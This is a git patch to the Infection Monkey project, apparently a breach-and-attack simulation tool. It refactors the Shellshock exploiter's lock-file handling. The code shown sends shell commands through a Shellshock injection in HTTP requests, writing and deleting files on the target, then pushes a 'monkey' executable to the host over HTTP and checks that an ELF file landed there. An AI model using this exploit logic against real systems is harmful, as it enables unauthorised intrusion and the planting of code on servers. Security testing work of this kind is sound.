From 7b0bf71279112196954c7be834bc20fa5c2390b2 Mon Sep 17 00:00:00 2001 From: Anh T Nguyen Date: Sat, 7 Sep 2019 07:14:11 +0700 Subject: [PATCH] update --- monkey/infection_monkey/exploit/__init__.py | 12 +-------- monkey/infection_monkey/exploit/shellshock.py | 27 +++++++------------ 2 files changed, 11 insertions(+), 28 deletions(-) diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index a75675942..ad38f50ce 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py @@ -75,17 +75,7 @@ class HostExploiter(object): """ powershell = True if "powershell" in cmd.lower() else False self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell}) - - def _try_lock(self, create_file_fn, path): - """ - Create temporary file on target machine to avoid collision of long-running exploiters - :return: True if no other monkey is running same exploit - """ - return create_file_fn(path) - - def _exit_lock(self, remove_file_fn, path): - remove_file_fn(path) - + from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter from infection_monkey.exploit.wmiexec import WmiExploiter diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index 46de37797..78e668fc1 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -109,9 +109,8 @@ class ShellShockExploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", self.host) return False - if not self._try_lock(create_file_fn=self._create_lock_file(exploit, url, header), - path=LOCK_HELPER_FILE): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + if not self._create_lock_file(exploit, url, header): + LOG.info("Another monkey is running shellshock exploit") return True http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) @@ -130,8 +129,7 @@ class ShellShockExploiter(HostExploiter): http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() - self._exit_lock(remove_file_fn=self._remove_lock_file(exploit, url, header), - path=LOCK_HELPER_FILE) + self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ( 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): @@ -192,20 +190,15 @@ class ShellShockExploiter(HostExploiter): return False, def _create_lock_file(self, exploit, url, header): - def f(filepath): - if self.check_remote_file_exists(url, header, exploit, filepath): - LOG.info("Another monkey is running shellshock exploit") - return False - cmd = exploit + 'echo AAAA > %s' % filepath - self.attack_page(url, header, cmd) - return True - return f + if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE): + return False + cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE + self.attack_page(url, header, cmd) + return True def _remove_lock_file(self, exploit, url, header): - def f(filepath): - cmd = exploit + 'rm %s' % filepath - self.attack_page(url, header, cmd) - return f + cmd = exploit + 'rm %s' % LOCK_HELPER_FILE + self.attack_page(url, header, cmd) @staticmethod def attack_page(url, header, attack):